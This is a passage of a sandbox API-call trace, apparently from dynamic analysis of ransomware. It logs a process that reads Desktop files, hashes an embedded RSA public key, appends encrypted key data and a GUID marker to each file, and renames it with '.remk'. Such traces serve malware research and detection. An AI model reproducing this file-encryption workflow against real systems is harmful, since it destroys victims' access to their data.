lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0233.075] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37b5b70 [0233.075] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.075] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0233.075] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0233.075] CloseHandle (hObject=0x640) returned 1 [0233.078] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0233.078] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x37b5b70 [0233.079] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0wlw97NT\\4jworgauj.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0wlw97nt\\4jworgauj.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0wlw97NT\\4jworgauj.bmp.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0wlw97nt\\4jworgauj.bmp.remk")) returned 1 [0233.080] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d868d20, ftCreationTime.dwHighDateTime=0x1d5e521, ftLastAccessTime.dwLowDateTime=0xb515b480, ftLastAccessTime.dwHighDateTime=0x1d5e0a2, ftLastWriteTime.dwLowDateTime=0xb515b480, ftLastWriteTime.dwHighDateTime=0x1d5e0a2, nFileSizeHigh=0x0, nFileSizeLow=0x11133, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iICxrqLlbVh.m4a", cAlternateFileName="IICXRQ~1.M4A")) returned 1 [0233.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e568 [0233.081] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0wlw97NT\\iICxrqLlbVh.m4a") returned=".m4a" [0233.081] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0wlw97NT\\iICxrqLlbVh.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0wlw97nt\\iicxrqllbvh.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0233.081] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=69939) returned 1 [0233.081] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0233.084] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x1110d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.084] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0233.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0233.086] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x11133, lpOverlapped=0x0) returned 1 [0233.087] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0233.087] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.087] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.087] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0233.088] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0233.088] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0233.088] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0233.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0233.089] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0233.089] GetLastError () returned 0x0 [0233.089] CryptDestroyHash (hHash=0x31de170) returned 1 [0233.089] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0233.089] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0233.089] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0233.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.089] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0233.089] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0233.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0233.090] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x11133, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.090] WriteFile (in: hFile=0x640, lpBuffer=0x31a4298*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31a4298*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0233.090] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0233.090] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0233.090] CloseHandle (hObject=0x640) returned 1 [0233.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0233.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x37b5b70 [0233.092] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0wlw97NT\\iICxrqLlbVh.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0wlw97nt\\iicxrqllbvh.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0wlw97NT\\iICxrqLlbVh.m4a.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0wlw97nt\\iicxrqllbvh.m4a.remk")) returned 1 [0233.094] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70fd0b10, ftCreationTime.dwHighDateTime=0x1d5e771, ftLastAccessTime.dwLowDateTime=0x5a82fbc0, ftLastAccessTime.dwHighDateTime=0x1d5ddcf, ftLastWriteTime.dwLowDateTime=0x5a82fbc0, ftLastWriteTime.dwHighDateTime=0x1d5ddcf, nFileSizeHigh=0x0, nFileSizeLow=0xbb81, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JnCykkanbvIZuzN.gif", cAlternateFileName="JNCYKK~1.GIF")) returned 1 [0233.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e568 [0233.094] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0wlw97NT\\JnCykkanbvIZuzN.gif") returned=".gif" [0233.094] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0wlw97NT\\JnCykkanbvIZuzN.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0wlw97nt\\jncykkanbvizuzn.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0233.095] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=48001) returned 1 [0233.095] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0233.100] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xbb5b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.100] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0233.102] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0233.102] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xbb81, lpOverlapped=0x0) returned 1 [0233.103] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.103] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0233.103] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.103] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.104] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0233.105] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0233.105] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0233.105] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0233.105] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0233.105] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0233.105] GetLastError () returned 0x0 [0233.105] CryptDestroyHash (hHash=0x31de170) returned 1 [0233.105] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0233.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.105] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0233.106] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0233.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.106] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0233.106] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0233.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xbb80) returned 0x37c2278 [0233.106] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0233.106] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0233.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0233.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fd48 [0233.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0233.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bb588 [0233.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee2f8 [0233.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bb5d0 [0233.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee310 [0233.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee340 [0233.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee3a0 [0233.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee358 [0233.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0233.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0233.107] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0233.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0233.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee340 | out: hHeap=0x630000) returned 1 [0233.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee358 | out: hHeap=0x630000) returned 1 [0233.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee3a0 | out: hHeap=0x630000) returned 1 [0233.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0233.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee3a0 [0233.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0233.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee358 [0233.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0233.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee340 [0233.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0233.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31a4298 [0233.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0233.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d69f0 [0233.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0233.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0233.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0233.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0233.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0233.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee358 | out: hHeap=0x630000) returned 1 [0233.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0233.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee340 | out: hHeap=0x630000) returned 1 [0233.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0233.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee3a0 | out: hHeap=0x630000) returned 1 [0233.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0233.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0233.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0233.109] GetCurrentThreadId () returned 0x314 [0233.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31a4298 [0233.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37b98f0 [0233.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0233.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0233.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3192918 [0233.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0233.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0233.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0233.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.110] GetCurrentThreadId () returned 0x314 [0233.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0233.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0233.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0233.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0233.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0233.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31b6580 [0233.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0233.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee3a0 [0233.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0233.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0233.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0233.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0233.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0233.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0233.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0233.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0233.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee340 [0233.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0233.112] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xbb81, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.112] WriteFile (in: hFile=0x640, lpBuffer=0x31a4298*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31a4298*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0233.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0233.112] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0233.112] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0233.112] CloseHandle (hObject=0x640) returned 1 [0233.114] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0wlw97NT\\JnCykkanbvIZuzN.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0wlw97nt\\jncykkanbvizuzn.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0wlw97NT\\JnCykkanbvIZuzN.gif.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0wlw97nt\\jncykkanbvizuzn.gif.remk")) returned 1 [0233.115] HeapFree (in: 